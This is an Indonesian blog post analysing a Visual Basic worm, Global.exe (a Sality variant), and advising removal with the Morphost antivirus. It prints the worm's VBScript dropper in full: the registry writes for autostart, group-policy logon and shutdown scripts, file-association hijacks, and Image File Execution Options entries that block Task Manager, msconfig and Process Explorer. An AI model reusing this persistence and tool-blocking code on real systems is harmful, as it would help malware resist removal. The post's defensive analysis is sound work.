Senin, 05 Januari 2009

Menghapus Virus Global.exe

Hasil Analisa Saya sewaktu melihat Virus tersebut

Nama Malware : Global.Worm [Morphost], virus.Win32.Sality.z [KasperskyLab], W32.Silly.FDC [Symantec], W32/Sality.ag [McAfee]

Ukuran : 286,720 bytes

Pengirim Virus : ditemukan oleh metode Heuristik Morphost

Icon : icon folder

CRC32 : 55BC6B01 (berdasarkan file yang ditemukan)

MD5 : 67CE8B53CBF5A1D3BF4269748F82ACCA (berdasarkan file yang ditemukan)

Dibuat dengan : Visual Basic


Direktori projek saat pembuatan virus ini adalah:

C:\Documents and Settings\TASDA.TASDA-B20F43BAE\Desktop07\Project1.vbp


Ditemukan script vbs seperti berikut:

dim fs,rg

set fs = createobject("scripting.filesystemobject")

set rg = createobject("wscript.shell")

on error resume next

rg.regwrite "HKCR\.vbs\", "VBSFile"

rg.regwrite "HKCU\Control Panel\Desktop\SCRNSAVE.EXE", " C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"

rg.regwrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut", "30"

rg.regwrite "HKCR\MSCFile\Shell\Open\Command\", "C:\WINDOWS\pchealth\Global.exe"

rg.regwrite "HKCR\regfile\Shell\Open\Command\", "C:\WINDOWS\pchealth\Global.exe"

rg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\", "C:\WINDOWS\system32\dllcache\Default.exe"

rg.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\", "C:\WINDOWS\system32\dllcache\Default.exe"

rg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\", "C:\WINDOWS\system\KEYBOARD.exe"

rg.regwrite "HKEY_CLASSES_ROOT\MSCFile\Shell\Open\Command\", "C:\WINDOWS\Fonts\Fonts.exe"


rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\DisplayName","Local Group Policy"

rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\FileSysPath",""

rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\GPO-ID","LocalGPO"

rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\GPOName","Local Group Policy"

rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\SOM-ID","Local"

rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\Parameters",""

rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\Script","C:\WINDOWS\Cursors\Boom.vbs"


rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\DisplayName", "Local Group Policy"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\FileSysPath", ""

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\GPO-ID", "LocalGPO"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\GPOName", "Local Group Policy"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\SOM-ID", "Local"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\Parameters", ""

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\Script", "C:\WINDOWS\Cursors\Boom.vbs"


rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\DisplayName", "Local Group Policy"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\FileSysPath", ""

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\GPO-ID", "LocalGPO"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\GPOName", "Local Group Policy"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\SOM-ID", "Local"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\Parameters", ""

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\Script", "C:\WINDOWS\Cursors\Boom.vbs"


If Not fs.fileexists("C:\WINDOWS\Fonts\Fonts.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\Fonts\Fonts.exe")

If Not fs.fileexists("C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com")

If Not fs.fileexists("C:\WINDOWS\pchealth\Global.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\pchealth\Global.exe")

If Not fs.fileexists("C:\WINDOWS\system\KEYBOARD.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\system\KEYBOARD.exe")

If Not fs.fileexists("C:\WINDOWS\system32\dllcache\Default.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\system32\dllcache\Default.exe")

If Not fs.fileexists("C:\windows\system32\drivers\drivers.cab.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\system32\drivers\drivers.cab.exe ")

If Not fs.fileexists("C:\windows\media\rndll32.pif ") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\media\rndll32.pif")

If Not fs.fileexists("C:\windows\fonts\tskmgr.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\fonts\tskmgr.exe")




Membuat File di:

“C:\windows\system32\dllchace\autorun.inf”

“C;\windows\Cursors\Boom.vbs”

Dan lain-lain



Membuat registry key berikut:

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\comfile]

NeverShowExt = "1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile]

NeverShowExt = "1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSCFile\Shell\Open\Command]

(Default) = "%FontsDir%\Fonts.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]

DisableStatusMessages = 0x00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]

sys = "%FontsDir%\Fonts.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

(Default) = "%Windir%\system\KEYBOARD.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]

(Default) = "%System%\dllcache\Default.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\auto.exe]

Debugger = "%System%\drivers\drivers.cab.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe]

Debugger = "%System%\drivers\drivers.cab.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe]

Debugger = "%System%\drivers\drivers.cab.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\boot.exe]

Debugger = "%FontsDir%\fonts.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe]

Debugger = "%FontsDir%\Fonts.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe]

Debugger = "%Windir%\Media\rndll32.pif"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe]

* Debugger = "%Windir%\pchealth\helpctr\binaries\HelpHost.com"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe]

Debugger = "%FontsDir%\tskmgr.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Shutdown]

Parameters = ""

Script = "%Windir%\Cursors\Boom.vbs"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Shutdown]

DisplayName = "Local Group Policy"

FileSysPath = ""

GPO-ID = "LocalGPO"

GPOName = "Local Group Policy"

SOM-ID = "Local"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup]

Parameters = ""

Script = "%Windir%\Cursors\Boom.vbs"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup]

DisplayName = "Local Group Policy"

FileSysPath = ""

GPO-ID = "LocalGPO"

GPOName = "Local Group Policy"

SOM-ID = "Local"

[HKEY_CURRENT_USER\Control Panel\Desktop]

SCRNSAVE.EXE = "%Windir%\pchealth\helpctr\binaries\HelpHost.com"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]

(Default) = "%System%\dllcache\Default.exe"

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\Scripts\Logoff]

Parameters = ""

Script = "%Windir%\Cursors\Boom.vbs"

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\Scripts\Logoff]

DisplayName = "Local Group Policy"

FileSysPath = ""

GPO-ID = "LocalGPO"

GPOName = "Local Group Policy"

SOM-ID = "Local"



Menghapus registry:

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSCFile\Shell\Open\Command]

(Default) = "%SystemRoot%\system32\mmc.exe "%1" %*"




Memodifikasi registry value:

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command]

(Default) = "%Windir%\pchealth\Global.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]

ValueName = "ShowSuperHiden"

[HKEY_CURRENT_USER\Control Panel\Desktop]

AutoEndTasks = "1"

ScreenSaveTimeOut = "30"



=============================================================================


Untuk worm ini sudah bisa dibereskan dengan Morphost Antivirus. [NB: Sekarang Morphost udah diperbaharui, jadi silakan download Morphost yang baru.]

Signature worm ini sudah saya masukkan ke dalam database Morphost. Jadi kamu sudah bisa menggunakan Morphost untuk menscan Komputermu dari Global.Worm.

Kalo Global.Worm belum juga pergi dari komputermu. Lakukan langkah berikut:

-Pilih tab settings

-Pilih options ”let users make their database themselves” pada frames “database”

-Lalu masukkan satu saja sampel Global.Worm

-Dan langsung scan!
Label:

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)